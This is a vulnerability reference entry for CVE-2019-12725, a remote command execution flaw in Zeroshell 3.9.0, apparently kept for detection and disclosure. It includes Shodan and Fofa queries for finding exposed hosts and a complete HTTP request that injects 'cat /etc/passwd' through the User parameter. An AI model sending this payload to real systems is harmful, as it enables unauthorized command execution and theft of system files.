🔙 목록으로 돌아가기

CVE-2019-12725: Zeroshell 3.9.0 - Remote Command Execution

TitleZeroshell 3.9.0 - Remote Command Execution
Authordwisiswant0,akincibor
SeverityCritical
ImpactSuccessful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
RemediationUpgrade to 3.9.5. Be aware this product is no longer supported.
CVSS Score9.8
EPSS Score0.94144
CVE IDCVE-2019-12725
CWE IDCWE-78
Shodan Queryhttp.title:"zeroshell"
Fofa Querytitle="zeroshell"
Tags cve cve2019 packetstorm rce zeroshell vkev vuln

🔍 Vulnerability Description

Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.

🌐 HTTP Request

GET /cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; WOW64; rv:41.0) Gecko/20100101 Firefox/140.0 (x64 de)
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-12725.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-12725.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A